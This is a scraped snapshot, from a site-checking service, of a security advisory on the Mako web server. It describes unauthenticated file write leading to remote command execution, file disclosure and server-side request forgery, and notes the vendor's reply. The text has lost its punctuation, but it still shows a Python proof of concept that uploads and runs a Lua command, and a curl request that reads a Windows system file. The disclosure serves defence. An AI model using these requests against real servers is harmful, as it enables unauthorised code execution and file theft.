If you are not sure whether a website you would like to visit is secure, you can verify it here. Enter the address of the page to see parts of its content and its thumbnail images on this site. Dangerous scripts on the referenced page, if any, will not be executed. Additionally, if the selected site contains subpages, you can review them in batches of 5 pages.
site address: hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt

site title:

Our opinion (on Tuesday 16 April 2024 8:11:09 GMT):

GREEN status (no comments)
After content analysis of this website we propose the following hashtags:



Meta tags:

Headings (most frequently used words):

-

Text of the page (most frequently used words):
the (22), http (13), #request (12), #server (9), #victim (8), lsp (7), and (7), web (7), #mako (7), get (7), #unauthenticated (6), for (6), #page (5), #vulnerability (5), #file (5), #urllib2 (5), put (5), #vulnerabilities (5), hyp3rlinx (5), remote (4), these (4), command (4), windows (4), examples (4), execution (4), execute (4), tutorial (4), disclosure (3), lua (3), with (3), manage (3), ini (3), system (3), add_header (3), response (3), type (3), content (3), securiteam (3), attacker (3), time (3), save (3), john (3), input (3), leads (2), when (2), org (2), can (2), altervista (2), requests (2), credits (2), linux (2), sufficiently (2), sanitizing (2), that (2), true (2), aka (2), not (2), this (2), opener (2), proof (2), concept (2), security (2), cmd (2), makoserver (2), beyond (2), send (2), following (2), write (2), arbitrary (2), are (2), passed (2), port (2), found (2), curl (2), secure (2), advisory (2), will (2), application (2), design (2), developers (2), need (2), connected (2), does, responsible, victims, filesystem, function, saved, import, details, failed, sending, machine, accessing, ssd, 0day, x86_64, without, modification, returned, about, connect, trying, user, agent, redhat, urlopen, gnu, libcurl, openssl, zlib, libidn, host, uri, sleep, print, charset, system32, calc, exe, build_opener, httphandler, data, text, plain, utf, open, requested, xmlhttprequest, referer, localhost, types, clarification, lambda, get_method, license, status, provides, important, users, aware, issues, compact, helps, rapidly, iot, applications, environment, production, from, which, implement, complete, custom, solutions, ideal, embedded, systems, credit, independent, code, basis, has, advisories, https, blogs, com, index, php, archives, 3391, website, source, multiple, used, vulnerabiliities, txt, isr, apparitionsec, summary, describe, three, servers, side, forgery, may, researcher, reported, attempts, allocation, requirement, also, maintenance, contract, place, 
internally, set, cost, account, notification, billing, against, support, inquiries, its, unclear, whether, going, fixed, further, commercial, formal, securitys, receipt, program, vendor, realtimelogic, was, informed, aug, but, while, acknowledging, information, sent, refused, respond, technical, claims, give, fix, timeline, coordinate, saying, just, accept,


Text of the page (random words):
ssd beyond security https blogs securiteam com index php archives 3391 credits john page a k a hyp3rlinx website hyp3rlinx altervista org source http hyp3rlinx altervista org advisories mako web server multiple unauthenticated vulnerabiliities securiteam txt isr apparitionsec vulnerabilities summary the following advisory describe three 3 vulnerabilities found in mako servers tutorial page the vulnerabilities found are unauthenticated arbitrary file write vulnerability that leads to remote command execution unauthenticated file disclosure unauthenticated server side request forgery as these tutorial may be used as the basis for production code it is important for users to be aware of these issues as a compact application and web server the mako server helps developers rapidly design secure iot and web applications the mako server provides an application server environment from which developers can design and implement complete custom solutions the mako web server is ideal for embedded linux systems credit an independent security researcher john page aka hyp3rlinx has reported this vulnerability to beyond securitys securiteam secure disclosure program vendor response realtimelogic was informed of the vulnerability on aug 13 but while acknowledging the receipt of the vulnerability information refused to respond to the technical claims to give a fix timeline or coordinate an advisory saying i just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place internally i need to set up a cost allocation account for billing against these support inquiries at this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed vulnerabilities details unauthenticated arbitrary file write vulnerability that leads to remote command execution mako web server tutorial does not sufficiently sanitizing the http put requests when an attacker send http put 
request to save lsp web page the input passed to a function responsible for accessing the filesystem the attacker input will be saved on the victims machine and can be execute by sending http get request to manage lsp http put http victim ip examples save lsp ex 2 1 http get http victim ip examples manage lsp execute true ex 2 1 type lua proof of concept import urllib2 time makoserver v2 5 remote command execution 0day credits john page aka hyp3rlinx print makoserver v2 5 remote command execution cmd os execute c windows system32 calc exe opener urllib2 build_opener urllib2 httphandler request urllib2 request http ip examples save lsp ex 2 1 data cmd request add_header content type text plain charset utf 8 request add_header x requested with xmlhttprequest request add_header referer http localhost lua types lsp request get_method lambda put opener open request time sleep 1 urllib2 urlopen http ip examples manage lsp execute true ex 2 1 type lua unauthenticated file disclosure mako web server tutorial is not sufficiently sanitizing get requests when an attacker send get request to the uri ip fs the input passed without modification and the response with the file content is returned proof of concept the following get request will response with the c windows system ini content curl v http victim ip fs c windows system ini about to connect to victim ip port 80 trying victim ip connected connected to victim ip victim ip port 80 get fs c windows system ini http 1 1 user agent curl 7 15 5 x86_64 redhat linux gnu libcurl 7 15 5 openssl 0 9 8b zlib 1 2 3 libidn 0 6 5 host victim ip accept
    Supplementary Information (add-on for SEO geeks)* - see more on header.verify-www.com

    Header

    HTTP/1.1 200 OK
    Date Tue, 16 Apr 2024 08:11:08 GMT
    Server Apache
    Last-Modified Wed, 13 Sep 2017 05:54:30 GMT
    ETag 1742-5590bcb11b180-gzip
    Accept-Ranges bytes
    Vary Accept-Encoding
    Content-Encoding gzip
    Content-Length 2637
    Connection close
    Content-Type text/plain

    Load Info

    page size2637
    load time (s)0.056938
    redirect count0
    speed download46313
    server IP168.119.39.36
    * all occurrences of the string "http://" have been changed to "htt???/"
